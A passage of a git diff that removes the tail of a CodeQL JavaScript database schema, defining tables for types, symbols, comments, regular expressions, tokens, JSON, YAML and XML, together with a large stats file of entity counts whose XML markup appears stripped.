-| 6 = @type_reference -| 7 = @object_type -| 8 = @canonical_type_variable_type -| 9 = @typeof_type -| 10 = @void_type -| 11 = @undefined_type -| 12 = @null_type -| 13 = @never_type -| 14 = @plain_symbol_type -| 15 = @unique_symbol_type -| 16 = @objectkeyword_type -| 17 = @intersection_type -| 18 = @tuple_type -| 19 = @lexical_type_variable_type -| 20 = @this_type -| 21 = @number_literal_type -| 22 = @string_literal_type -| 23 = @unknown_type -| 24 = @bigint_type -| 25 = @bigint_literal_type -; - -@boolean_literal_type = @true_type | @false_type; -@symbol_type = @plain_symbol_type | @unique_symbol_type; -@union_or_intersection_type = @union_type | @intersection_type; -@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; - -has_asserts_keyword(int node: @predicate_typeexpr ref); - -@typed_ast_node = @expr | @typeexpr | @function; -ast_node_type( - unique int node: @typed_ast_node ref, - int typ: @type ref); - -declared_function_signature( - unique int node: @function ref, - int sig: @signature_type ref -); - -invoke_expr_signature( - unique int node: @invokeexpr ref, - int sig: @signature_type ref -); - -invoke_expr_overload_index( - unique int node: @invokeexpr ref, - int index: int ref -); - -symbols ( - unique int id: @symbol, - int kind: int ref, - varchar(900) name: string ref -); - -symbol_parent ( - unique int symbol: @symbol ref, - int parent: @symbol ref -); - -symbol_module ( - int symbol: @symbol ref, - varchar(900) moduleName: string ref -); - -symbol_global ( - int symbol: @symbol ref, - varchar(900) globalName: string ref -); - -case @symbol.kind of - 0 = @root_symbol -| 1 = @member_symbol -| 2 = @other_symbol -; - -@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; -@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; - -ast_node_symbol( - unique int node: @ast_node_with_symbol ref, - int symbol: @symbol ref); - -type_symbol( - unique int typ: @type_with_symbol ref, - int symbol: @symbol ref); - -#keyset[typ, name] -type_property( - int typ: @type ref, - varchar(900) name: string ref, - int propertyType: @type ref); - -type_alias( - unique int aliasType: @type ref, - int underlyingType: @type ref); - -@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; -@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; -type_literal_value( - unique int typ: @type_with_literal_value ref, - varchar(900) value: string ref); - -signature_types ( - unique int id: @signature_type, - int kind: int ref, - varchar(900) tostring: string ref, - int type_parameters: int ref, - int required_params: int ref -); - -is_abstract_signature( - unique int sig: @signature_type ref -); - -signature_rest_parameter( - unique int sig: @signature_type ref, - int rest_param_arra_type: @type ref -); - -case @signature_type.kind of - 0 = @function_signature_type -| 1 = @constructor_signature_type -; - -#keyset[typ, kind, index] -type_contains_signature ( - int typ: @type ref, - int kind: int ref, // constructor/call/index - int index: int ref, // ordering of overloaded signatures - int sig: @signature_type ref -); - -#keyset[parent, index] -signature_contains_type ( - int child: @type ref, - int parent: @signature_type ref, - int index: int ref -); - -#keyset[sig, index] -signature_parameter_name ( - int sig: @signature_type ref, - int index: int ref, - varchar(900) name: string ref -); - -number_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -string_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -base_type_names( - int typeName: @symbol ref, - int baseTypeName: @symbol ref -); - -self_types( - int typeName: @symbol ref, - int selfType: @type_reference ref -); - -tuple_type_min_length( - unique int typ: @type ref, - int minLength: int ref -); - -tuple_type_rest_index( - unique int typ: @type ref, - int index: int ref -); - -// comments -comments (unique int id: @comment, - int kind: int ref, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(900) tostring: string ref); - -case @comment.kind of - 0 = @slashslash_comment -| 1 = @slashstar_comment -| 2 = @doc_comment -| 3 = @html_comment_start -| 4 = @htmlcommentend; - -@html_comment = @html_comment_start | @htmlcommentend; -@line_comment = @slashslash_comment | @html_comment; -@block_comment = @slashstar_comment | @doc_comment; - -// source lines -lines (unique int id: @line, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(2) terminator: string ref); -indentation (int file: @file ref, - int lineno: int ref, - varchar(1) indentChar: string ref, - int indentDepth: int ref); - -// JavaScript parse errors -js_parse_errors (unique int id: @js_parse_error, - int toplevel: @toplevel ref, - varchar(900) message: string ref, - varchar(900) line: string ref); - -// regular expressions -#keyset[parent, idx] -regexpterm (unique int id: @regexpterm, - int kind: int ref, - int parent: @regexpparent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; - -case @regexpterm.kind of - 0 = @regexp_alt -| 1 = @regexp_seq -| 2 = @regexp_caret -| 3 = @regexp_dollar -| 4 = @regexp_wordboundary -| 5 = @regexp_nonwordboundary -| 6 = @regexp_positive_lookahead -| 7 = @regexp_negative_lookahead -| 8 = @regexp_star -| 9 = @regexp_plus -| 10 = @regexp_opt -| 11 = @regexp_range -| 12 = @regexp_dot -| 13 = @regexp_group -| 14 = @regexp_normal_constant -| 15 = @regexp_hex_escape -| 16 = @regexp_unicode_escape -| 17 = @regexp_dec_escape -| 18 = @regexp_oct_escape -| 19 = @regexp_ctrl_escape -| 20 = @regexp_char_class_escape -| 21 = @regexp_id_escape -| 22 = @regexp_backref -| 23 = @regexp_char_class -| 24 = @regexp_char_range -| 25 = @regexp_positive_lookbehind -| 26 = @regexp_negative_lookbehind -| 27 = @regexp_unicode_property_escape; - -regexp_parse_errors (unique int id: @regexp_parse_error, - int regexp: @regexpterm ref, - varchar(900) message: string ref); - -@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; -@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; -@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; -@regexp_constant = @regexp_normal_constant | @regexp_char_escape; -@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; -@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; -@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; -@regexp_anchor = @regexp_dollar | @regexp_caret; - -is_greedy (int id: @regexp_quantifier ref); -range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); -range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); -is_capture (unique int id: @regexp_group ref, int number: int ref); -is_named_capture (unique int id: @regexp_group ref, string name: string ref); -is_inverted (int id: @regexp_char_class ref); -regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); -char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); -backref (unique int id: @regexp_backref ref, int value: int ref); -named_backref (unique int id: @regexp_backref ref, string name: string ref); -unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); -unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); - -// tokens -#keyset[toplevel, idx] -tokeninfo (unique int id: @token, - int kind: int ref, - int toplevel: @toplevel ref, - int idx: int ref, - varchar(900) value: string ref); - -case @token.kind of - 0 = @token_eof -| 1 = @token_null_literal -| 2 = @token_boolean_literal -| 3 = @token_numeric_literal -| 4 = @token_string_literal -| 5 = @token_regular_expression -| 6 = @token_identifier -| 7 = @token_keyword -| 8 = @token_punctuator; - -// associate comments with the token immediately following them (which may be EOF) -next_token (int comment: @comment ref, int token: @token ref); - -// JSON -#keyset[parent, idx] -json (unique int id: @json_value, - int kind: int ref, - int parent: @json_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -json_literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @json_value ref); - -json_properties (int obj: @json_object ref, - varchar(900) property: string ref, - int value: @json_value ref); - -json_errors (unique int id: @json_parse_error, - varchar(900) message: string ref); - -json_locations(unique int locatable: @json_locatable ref, - int location: @location_default ref); - -case @json_value.kind of - 0 = @json_null -| 1 = @json_boolean -| 2 = @json_number -| 3 = @json_string -| 4 = @json_array -| 5 = @json_object; - -@json_parent = @json_object | @json_array | @file; - -@json_locatable = @json_value | @json_parse_error; - -// locations -@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; - -@locatable = @file - | @ast_node - | @comment - | @line - | @js_parse_error | @regexp_parse_error - | @regexpterm - | @json_locatable - | @token - | @cfg_node - | @jsdoc | @jsdoc_type_expr | @jsdoc_tag - | @yaml_locatable - | @xmllocatable - | @configLocatable - | @template_placeholder_tag; - -hasLocation (unique int locatable: @locatable ref, - int location: @location ref); - -// CFG -entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); -exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); -guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); -case @guard_node.kind of - 0 = @falsy_guard -| 1 = @truthy_guard; -@condition_guard = @falsy_guard | @truthy_guard; - -@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; -@cfg_node = @synthetic_cfg_node | @expr_parent; - -successor (int pred: @cfg_node ref, int succ: @cfg_node ref); - -// JSDoc comments -jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); -#keyset[parent, idx] -jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, - int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); -jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); -jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); - -#keyset[parent, idx] -jsdoc_type_exprs (unique int id: @jsdoc_type_expr, - int kind: int ref, - int parent: @jsdoc_type_expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); -case @jsdoc_type_expr.kind of - 0 = @jsdoc_any_type_expr -| 1 = @jsdoc_null_type_expr -| 2 = @jsdoc_undefined_type_expr -| 3 = @jsdoc_unknown_type_expr -| 4 = @jsdoc_void_type_expr -| 5 = @jsdoc_named_type_expr -| 6 = @jsdoc_applied_type_expr -| 7 = @jsdoc_nullable_type_expr -| 8 = @jsdoc_non_nullable_type_expr -| 9 = @jsdoc_record_type_expr -| 10 = @jsdoc_array_type_expr -| 11 = @jsdoc_union_type_expr -| 12 = @jsdoc_function_type_expr -| 13 = @jsdoc_optional_type_expr -| 14 = @jsdoc_rest_type_expr -; - -#keyset[id, idx] -jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); -jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); -jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); - -@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; - -jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); - -@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; - -@optionalchainable = @call_expr | @propaccess; - -isOptionalChaining(int id: @optionalchainable ref); - -/** - * The time taken for the extraction of a file. - * This table contains non-deterministic content. - * - * The sum of the `time` column for each (`file`, `timerKind`) pair - * is the total time taken for extraction of `file`. The `extractionPhase` - * column provides a granular view of the extraction time of the file. - */ -extraction_time( - int file : @file ref, - // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. - int extractionPhase: int ref, - // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds - int timerKind: int ref, - float time: float ref -) - -/** -* Non-timing related data for the extraction of a single file. -* This table contains non-deterministic content. -*/ -extraction_data( - int file : @file ref, - // the absolute path to the cache file - varchar(900) cacheFile: string ref, - boolean fromCache: boolean ref, - int length: int ref -) - -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- XML Files -*/ - -xmlEncoding( - unique int id: @file ref, - string encoding: string ref -); - -xmlDTDs( - unique int id: @xmldtd, - string root: string ref, - string publicId: string ref, - string systemId: string ref, - int fileid: @file ref -); - -xmlElements( - unique int id: @xmlelement, - string name: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int fileid: @file ref -); - -xmlAttrs( - unique int id: @xmlattribute, - int elementid: @xmlelement ref, - string name: string ref, - string value: string ref, - int idx: int ref, - int fileid: @file ref -); - -xmlNs( - int id: @xmlnamespace, - string prefixName: string ref, - string URI: string ref, - int fileid: @file ref -); - -xmlHasNs( - int elementId: @xmlnamespaceable ref, - int nsId: @xmlnamespace ref, - int fileid: @file ref -); - -xmlComments( - unique int id: @xmlcomment, - string text: string ref, - int parentid: @xmlparent ref, - int fileid: @file ref -); - -xmlChars( - unique int id: @xmlcharacters, - string text: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int isCDATA: int ref, - int fileid: @file ref -); - -@xmlparent = @file | @xmlelement; -@xmlnamespaceable = @xmlelement | @xmlattribute; - -xmllocations( - int xmlElement: @xmllocatable ref, - int location: @location_default ref -); - -@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; - -/*- Configuration files with key value pairs -*/ - -configs( - unique int id: @config -); - -configNames( - unique int id: @configName, - int config: @config ref, - string name: string ref -); - -configValues( - unique int id: @configValue, - int config: @config ref, - string value: string ref -); - -configLocations( - int locatable: @configLocatable ref, - int location: @location_default ref -); - -@configLocatable = @config | @configName | @configValue; diff --git a/ql/lib/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats deleted file mode 100644 index 97ba6f9bcc3..00000000000 --- a/ql/lib/semmlecode.javascript.dbscheme.stats +++ /dev/null @@ -1,28248 +0,0 @@ - - - - -@location_default -15664049 - - -@file -6457 - - -@folder -1590 - - -@externalDataElement -950 - - -@toplevel -5320 - - -@script -5200 - - -@inline_script -86 - - -@event_handler -31 - - -@javascript_url -3 - - -@template_toplevel -100 - - -@stmt -1096691 - - -@empty_stmt -1136 - - -@block_stmt -204994 - - -@expr_stmt -610340 - - -@if_stmt -68214 - - -@labeled_stmt -1378 - - -@break_stmt -10149 - - -@continue_stmt -1642 - - -@with_stmt -4 - - -@switch_stmt -1569 - - -@return_stmt -48209 - - -@throw_stmt -2305 - - -@try_stmt -1316 - - -@while_stmt -3120 - - -@do_while_stmt -1471 - - -@for_stmt -5385 - - -@for_in_stmt -1315 - - -@debugger_stmt -3 - - -@function_decl_stmt -16771 - - -@var_decl_stmt -105606 - - -@case -8674 - - -@catch_clause -1272 - - -@for_of_stmt -61 - - -@const_decl_stmt -1118 - - -@let_stmt -551 - - -@legacy_let_stmt -1 - - -@for_each_stmt -1 - - -@class_decl_stmt -41 - - -@import_declaration -8 - - -@export_all_declaration -1 - - -@export_as_namespace_declaration -5 - - -@global_augmentation_declaration -5 - - -@using_decl_stmt -5 - - -@export_default_declaration -5 - - -@export_named_declaration -31 - - -@expr -5495305 - - -@label -722373 - - -@null_literal -15525 - - -@boolean_literal -31652 - - -@number_literal -557620 - - -@string_literal -268843 - - -@regexp_literal -2773 - - -@this_expr -128651 - - -@array_expr -28131 - - -@obj_expr -50958 - - -@function_expr -95744 - - -@seq_expr -2457 - - -@conditional_expr -8111 - - -@new_expr -19023 - - -@call_expr -487075 - - -@dot_expr -602582 - - -@index_expr -105192 - - -@neg_expr -11993 - - -@plus_expr -731 - - -@log_not_expr -19385 - - -@bit_not_expr -403 - - -@typeof_expr -4540 - - -@void_expr -51 - - -@delete_expr -1310 - - -@eq_expr -13468 - - -@neq_expr -5338 - - -@eqq_expr -17758 - - -@neqq_expr -5818 - - -@lt_expr -10254 - - -@le_expr -1503 - - -@gt_expr -5438 - - -@ge_expr -2527 - - -@lshift_expr -5655 - - -@rshift_expr -27749 - - -@urshift_expr -4331 - - -@add_expr -88032 - - -@sub_expr -10789 - - -@mul_expr -14075 - - -@div_expr -2496 - - -@mod_expr -655 - - -@bitor_expr -42853 - - -@xor_expr -503 - - -@bitand_expr -8538 - - -@in_expr -1135 - - -@instanceof_expr -1184 - - -@logand_expr -15892 - - -@logor_expr -12711 - - -@assign_expr -245084 - - -@assign_add_expr -6231 - - -@assign_sub_expr -823 - - -@assign_mul_expr -143 - - -@assign_div_expr -44 - - -@assign_mod_expr -17 - - -@assign_lshift_expr -57 - - -@assign_rshift_expr -86 - - -@assign_urshift_expr -96 - - -@assign_or_expr -586 - - -@assign_xor_expr -108 - - -@assign_and_expr -222 - - -@assignlogandexpr -1 - - -@assignlogorexpr -1 - - -@assignnullishcoalescingexpr -1 - - -@template_placeholder_tag -100 - - -@template_pipe_ref -100 - - -@generated_code_expr -100 - - -@satisfies_expr -100 - - -@preinc_expr -1792 - - -@postinc_expr -7103 - - -@predec_expr -457 - - -@postdec_expr -774 - - -@par_expr -86199 - - -@var_declarator -130843 - - -@arrow_function_expr -3730 - - -@spread_element -50 - - -@array_pattern -57 - - -@object_pattern -122 - - -@yield_expr -81 - - -@tagged_template_expr -27 - - -@template_literal -408 - - -@template_literal_typeexpr -100 - - -@template_element -639 - - -@array_comprehension_expr -3 - - -@generator_expr -1 - - -@for_in_comprehension_block -1 - - -@for_of_comprehension_block -3 - - -@legacy_letexpr -1 - - -@var_decl -250257 - - -@proper_varaccess -1295408 - - -@super_expr -11 - - -@newtarget_expr -1 - - -@import_meta_expr -1 - - -@named_import_specifier -4 - - -@import_default_specifier -4 - - -@import_namespace_specifier -2 - - -@named_export_specifier -5 - - -@export_default_specifier -5 - - -@export_namespace_specifier -5 - - -@export_assign_declaration -5 - - -@interface_declaration -5 - - -@type_alias_declaration -120 - - -@enum_declaration -252 - - -@external_module_declaration -100 - - -@external_module_reference -5 - - -@expression_with_type_arguments -45 - - -@prefix_type_assertion -1721 - - -@as_type_assertion -368 - - -@export_varaccess -15 - - -@decorator_list -2575 - - -@non_null_assertion -2159 - - -@dynamic_import -5 - - -@import_equals_declaration -5 - - -@namespace_declaration -5 - - -@namespace_scope -5 - - -@exp_expr -14075 - - -@assign_exp_expr -143 - - -@class_expr -41 - - -@scope -118172 - - -@global_scope -1 - - -@function_scope -116245 - - -@catch_scope -1272 - - -@module_scope -21 - - -@block_scope -584 - - -@for_scope -17 - - -@for_in_scope -28 - - -@comprehension_block_scope -4 - - -@class_expr_scope -41 - - -@class_decl_scope -2693 - - -@interface_scope -200 - - -@type_alias_scope -11 - - -@enum_scope -252 - - -@external_module_scope -100 - - -@mapped_type_scope -10 - - -@conditional_type_scope -100 - - -@variable -364388 - - -@local_type_name -23565 - - -@local_namespace_name -20832 - - -@property -142723 - - -@value_property -140856 - - -@property_getter -1529 - - -@property_setter -338 - - -@jsx_attribute -100 - - -@function_call_signature -2458 - - -@constructor_call_signature -37 - - -@index_signature -504 - - -@enum_member -2026 - - -@proper_field -16934 - - -@parameter_field -2693 - - -@static_initializer -100 - - -@local_type_access -25491 - - -@type_decl -2513 - - -@keyword_typeexpr -25306 - - -@string_literal_typeexpr -733 - - -@number_literal_typeexpr -3 - - -@boolean_literal_typeexpr -4 - - -@array_typeexpr -4579 - - -@union_typeexpr -852 - - -@intersection_typeexpr -27 - - -@parenthesized_typeexpr -62 - - -@tuple_typeexpr -98 - - -@keyof_typeexpr -3 - - -@indexed_access_typeexpr -3 - - -@qualified_type_access -3559 - - -@import_namespace_access -100 - - -@import_type_access -100 - - -@import_var_type_access -100 - - -@optional_typeexpr -100 - - -@rest_typeexpr -100 - - -@readonly_typeexpr -100 - - -@bigint_literal_typeexpr -100 - - -@generic_typeexpr -5220 - - -@type_label -3559 - - -@typeof_typeexpr -24 - - -@local_var_type_access -24 - - -@qualified_var_type_access -15 - - -@this_var_type_access -20 - - -@predicate_typeexpr -86 - - -@interface_typeexpr -1038 - - -@type_parameter -3463 - - -@plain_function_typeexpr -1674 - - -@local_namespace_access -4671 - - -@qualified_namespace_access -20 - - -@constructor_typeexpr -20 - - -@mapped_typeexpr -20 - - -@conditional_typeexpr -100 - - -@infer_typeexpr -100 - - -@comment -104947 - - -@any_type -1 - - -@string_type -1 - - -@number_type -1 - - -@union_type -1802 - - -@true_type -1 - - -@false_type -1 - - -@type_reference -12383 - - -@object_type -159099 - - -@canonical_type_variable_type -650 - - -@typeof_type -2903 - - -@void_type -1 - - -@undefined_type -1 - - -@null_type -1 - - -@never_type -1 - - -@plain_symbol_type -1 - - -@objectkeyword_type -1 - - -@intersection_type -369 - - -@tuple_type -307 - - -@lexical_type_variable_type -50 - - -@this_type -2731 - - -@number_literal_type -1244 - - -@string_literal_type -30638 - - -@unknown_type -100 - - -@bigint_type -100 - - -@bigint_literal_type -100 - - -@unique_symbol_type -100 - - -@root_symbol -2385 - - -@member_symbol -7223 - - -@other_symbol -584 - - -@function_signature_type -34698 - - -@constructor_signature_type -2646 - - -@slashslash_comment -76841 - - -@slashstar_comment -8834 - - -@doc_comment -19270 - - -@html_comment_start -1 - - -@htmlcommentend -1 - - -@line -1622184 - - -@js_parse_error -8 - - -@regexpterm -33197 - - -@regexp_alt -641 - - -@regexp_seq -3371 - - -@regexp_caret -826 - - -@regexp_dollar -637 - - -@regexp_wordboundary -99 - - -@regexp_nonwordboundary -3 - - -@regexp_positive_lookahead -15 - - -@regexp_negative_lookahead -12 - - -@regexp_star -1057 - - -@regexp_plus -1067 - - -@regexp_opt -478 - - -@regexp_range -146 - - -@regexp_dot -445 - - -@regexp_group -1692 - - -@regexp_normal_constant -15489 - - -@regexp_hex_escape -59 - - -@regexp_unicode_escape -264 - - -@regexp_dec_escape -7 - - -@regexp_oct_escape -1 - - -@regexp_ctrl_escape -599 - - -@regexp_char_class_escape -1573 - - -@regexp_id_escape -2613 - - -@regexp_backref -11 - - -@regexp_char_class -1473 - - -@regexp_char_range -619 - - -@regexp_positive_lookbehind -15 - - -@regexp_negative_lookbehind -12 - - -@regexp_unicode_property_escape -12 - - -@regexp_parse_error -122 - - -@token -8770869 - - -@token_eof -5312 - - -@token_null_literal -15526 - - -@token_boolean_literal -31654 - - -@token_numeric_literal -557620 - - -@token_string_literal -269555 - - -@token_regular_expression -2773 - - -@token_identifier -2268328 - - -@token_keyword -551767 - - -@token_punctuator -5068334 - - -@json_value -1643352 - - -@json_null -24 - - -@json_boolean -654 - - -@json_number -273113 - - -@json_string -752355 - - -@json_array -175925 - - -@json_object -441281 - - -@json_parse_error -1 - - -@entry_node -121542 - - -@exit_node -121542 - - -@guard_node -177785 - - -@jsdoc -19270 - - -@falsy_guard -86336 - - -@truthy_guard -91449 - - -@jsdoc_tag -29323 - - -@jsdoc_type_expr -22481 - - -@jsdoc_any_type_expr -292 - - -@jsdoc_null_type_expr -35 - - -@jsdoc_undefined_type_expr -287 - - -@jsdoc_unknown_type_expr -27 - - -@jsdoc_void_type_expr -8 - - -@jsdoc_named_type_expr -18639 - - -@jsdoc_applied_type_expr -303 - - -@jsdoc_nullable_type_expr -310 - - -@jsdoc_non_nullable_type_expr -536 - - -@jsdoc_record_type_expr -91 - - -@jsdoc_array_type_expr -19 - - -@jsdoc_union_type_expr -668 - - -@jsdoc_function_type_expr -316 - - -@jsdoc_optional_type_expr -895 - - -@jsdoc_rest_type_expr -55 - - -@jsdoc_error -1658 - - -@yaml_node -885 - - -@yaml_scalar_node -700 - - -@yaml_mapping_node -149 - - -@yaml_sequence_node -35 - - -@yaml_alias_node -1 - - -@yaml_error -1 - - -@jsx_element -1090 - - -@jsx_qualified_name -100 - - -@jsx_empty_expr -100 - - -@await_expr -100 - - -@function_sent_expr -100 - - -@decorator -100 - - -@bind_expr -100 - - -@bigint_literal -100 - - -@nullishcoalescing_expr -100 - - -@e4x_xml_anyname -100 - - -@e4x_xml_static_attribute_selector -100 - - -@e4x_xml_dynamic_attribute_selector -100 - - -@e4x_xml_filter_expression -100 - - -@e4x_xml_static_qualident -100 - - -@e4x_xml_dynamic_qualident -100 - - -@e4x_xml_dotdotexpr -100 - - -@xmldtd -1 - - -@xmlelement -1270313 - - -@xmlattribute -1202020 - - -@xmlnamespace -4185 - - -@xmlcomment -26812 - - -@xmlcharacters -439958 - - -@optionalchainable -100 - - -@nullishcoalescing_expr -100 - - -@config -69795 - - -@configName -69794 - - -@configValue -69691 - - - - - -locations_default -id -15664049 - - -id -15664049 - - -file -6457 - - -beginLine -277405 - - -beginColumn -117878 - - -endLine -277405 - - -endColumn -117868 - - - - -id -file - - -12 - - -1 -2 -15664049 - - - - - - -id -beginLine - - -12 - - -1 -2 -15664049 - - - - - - -id -beginColumn - - -12 - - -1 -2 -15664049 - - - - - - -id -endLine - - -12 - - -1 -2 -15664049 - - - - - - -id -endColumn - - -12 - - -1 -2 -15664049 - - - - - - -file -id - - -12 - - -1 -2 -674 - - -2 -28 -501 - - -28 -105 -488 - - -105 -211 -488 - - -211 -335 -490 - - -335 -477 -485 - - -477 -637 -488 - - -637 -856 -486 - - -856 -1141 -485 - - -1141 -1602 -485 - - -1604 -2336 -486 - - -2336 -4472 -485 - - -4472 -2368854 -416 - - - - - - -file -beginLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -513 - - -23 -35 -516 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -beginColumn - - -12 - - -1 -2 -674 - - -2 -12 -491 - - -12 -32 -495 - - -32 -46 -510 - - -46 -56 -498 - - -56 -62 -488 - - -62 -67 -500 - - -67 -71 -477 - - -71 -75 -583 - - -75 -78 -497 - - -78 -80 -403 - - -80 -82 -543 - - -82 -117856 -298 - - - - - - -file -endLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -509 - - -23 -35 -520 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -endColumn - - -12 - - -1 -2 -682 - - -2 -18 -501 - - -18 -36 -487 - - -36 -51 -513 - - -51 -61 -532 - - -61 -67 -508 - - -67 -72 -568 - - -72 -75 -444 - - -75 -78 -514 - - -78 -80 -484 - - -80 -81 -283 - - -81 -82 -579 - - -82 -117837 -362 - - - - - - -beginLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -19181 - - -14 -15 -29298 - - -15 -19 -25329 - - -19 -24 -17273 - - -24 -29 -22410 - - -29 -56 -21150 - - -56 -242 -20830 - - -242 -134468 -4769 - - - - - - -beginLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21079 - - -8 -6458 -17548 - - - - - - -beginLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19126 - - -11 -12 -32612 - - -12 -15 -18313 - - -15 -17 -18964 - - -17 -21 -21845 - - -21 -31 -21197 - - -31 -64 -20988 - - -64 -94454 -7194 - - - - - - -beginLine -endLine - - -12 - - -1 -2 -238980 - - -2 -3 -22312 - - -3 -890 -16113 - - - - - - -beginLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -20939 - - -12 -13 -28687 - - -13 -16 -19707 - - -16 -18 -20057 - - -18 -22 -21035 - - -22 -33 -21605 - - -33 -69 -21089 - - -69 -94455 -7120 - - - - - - -beginColumn -id - - -12 - - -1 -2 -5117 - - -2 -3 -9246 - - -3 -4 -13440 - - -4 -5 -15857 - - -5 -6 -13813 - - -6 -7 -11696 - - -7 -8 -8777 - - -8 -9 -6887 - - -9 -11 -9723 - - -11 -14 -10392 - - -14 -20 -9364 - - -20 -2248970 -3566 - - - - - - -beginColumn -file - - -12 - - -1 -2 -68610 - - -2 -3 -15842 - - -3 -4 -7965 - - -4 -5 -9221 - - -5 -6 -8014 - - -6 -6458 -8226 - - - - - - -beginColumn -beginLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10178 - - -6 -7 -6239 - - -7 -9 -10825 - - -9 -11 -9294 - - -11 -1255 -8841 - - -1258 -277405 -205 - - - - - - -beginColumn -endLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10175 - - -6 -7 -6232 - - -7 -9 -10827 - - -9 -11 -9299 - - -11 -1227 -8842 - - -1256 -277405 -207 - - - - - - -beginColumn -endColumn - - -12 - - -1 -2 -24039 - - -2 -3 -21662 - - -3 -4 -22809 - - -4 -5 -17118 - - -5 -6 -12038 - - -6 -7 -7768 - - -7 -10 -9297 - - -10 -1064 -3147 - - - - - - -endLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -18715 - - -14 -15 -30262 - - -15 -19 -24946 - - -19 -24 -17066 - - -24 -29 -22451 - - -29 -56 -21060 - - -56 -237 -20821 - - -237 -134470 -4919 - - - - - - -endLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21076 - - -8 